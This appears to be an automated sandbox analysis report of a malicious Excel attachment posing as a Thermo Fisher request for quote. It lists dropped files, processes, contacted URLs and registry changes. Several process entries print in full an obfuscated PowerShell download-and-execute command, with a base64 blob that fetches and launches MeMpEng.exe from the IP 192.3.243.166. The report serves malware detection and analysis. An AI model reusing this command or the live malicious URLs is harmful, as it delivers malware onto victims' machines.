Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Thermo Fisher RFQ_TFS-1805.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 03:58:51 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ideanetowroking[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsDialogs.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\LangDLL.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsDialogs.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\MeMpEng.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3688F29A.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A7ADD3.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B51D56E.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECB6B4E1.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESA15F.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 05:01:23 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESF3D2.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 05:01:45 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\aoifm5vd.1c1.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Tilstandstabellers.inv
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Tracker.Cop38
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\freemanship.txt
|
ASCII text, with very long lines (304), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\pressurization.pra
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\restriktivitets.bnk
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive\tresindstyvendedeles.ord
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\fyhnokoh.gcp.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jomm5bhe.2yt.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\w1nxsl3a.4us.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF5C7CF45281D8AE11.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF660952C4B52B5A5E.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF8BC8A5344F5550C8.TMP
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 03:58:51 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFBE6D8B1104A96767.TMP
|
data
|
dropped
|
There are 38 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS
-NOP -w 1 -C
DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOwERShEll.eXE -Ex byPasS -NOP
-w 1 -C DEvicEcREdeNTIaLdEployment
; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"
|
|
|
|
C:\Users\user\AppData\Roaming\MeMpEng.exe
|
"C:\Users\user\AppData\Roaming\MeMpEng.exe"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS
-NOP -w 1 -C
DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOwERShEll.eXE -Ex byPasS -NOP
-w 1 -C DEvicEcREdeNTIaLdEployment
; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
|
|
|
|
C:\Users\user\AppData\Roaming\MeMpEng.exe
|
"C:\Users\user\AppData\Roaming\MeMpEng.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp"
"c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp"
"c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP"
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://192.3.243.166/xampp/vcc/ideanetowroking.hta
|
192.3.243.166
|
|
|
|
http://192.3.243.166/340/MeMpEng.exe
|
192.3.243.166
|
|
|
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htaA
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://zhort.de/Fi
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.hta...
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
https://zhort.de/6XcI3x
|
88.99.66.38
|
||
|
http://go.micros
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.hta$
|
unknown
|
||
|
http://192.3.243.166/340/MeMpEng.exesNMicro#z
|
unknown
|
||
|
https://zhort.de/.n
|
unknown
|
||
|
https://zhort.de/tr
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://192.3.243.166/340/MeMpEng.exesAM
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.hta7
|
unknown
|
||
|
https://zhort.de/6XcI3xi
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htaV.
|
unknown
|
||
|
http://192.3.243.166/340/MeMpEng
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://192.3.243.166/
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://zhort.de/6XcI3xQ
|
unknown
|
||
|
Http://192.3.243.166/xampp/vcc/ideanetowroking.htaA
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://192.3.243.166//
|
unknown
|
||
|
https://zhort.de/6XcI3xI
|
unknown
|
||
|
http://192.3.243.166/3
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://192.3.243.166/340/MeMpEng.exeU/
|
unknown
|
||
|
https://zhort.de/6XcI3xta
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htab
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htahttp://192.3.243.166/xampp/vcc/ideanetowroking.hta
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htase
|
unknown
|
||
|
Http://192.3.243.166/xampp/vcc/ideanetowroking.htaf
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htaings
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htaZ
|
unknown
|
||
|
https://zhort.de/60
|
unknown
|
||
|
http://192.3.243.166/xampp/vcc/ideanetowroking.htattC:
|
unknown
|
||
|
http://192.3.243.166/340/MeMpEng.exes
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
https://zhort.de/6XcI3xtalicyu
|
unknown
|
||
|
http://192.3.243.166/340/MeMpEng.exep
|
unknown
|
||
|
https://zhort.de/
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 41 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
zhort.de
|
88.99.66.38
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.243.166
|
unknown
|
United States
|
|
|
|
88.99.66.38
|
zhort.de
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
`$0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28047
|
28047
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
5-0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31EC7
|
31EC7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32B83
|
32B83
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
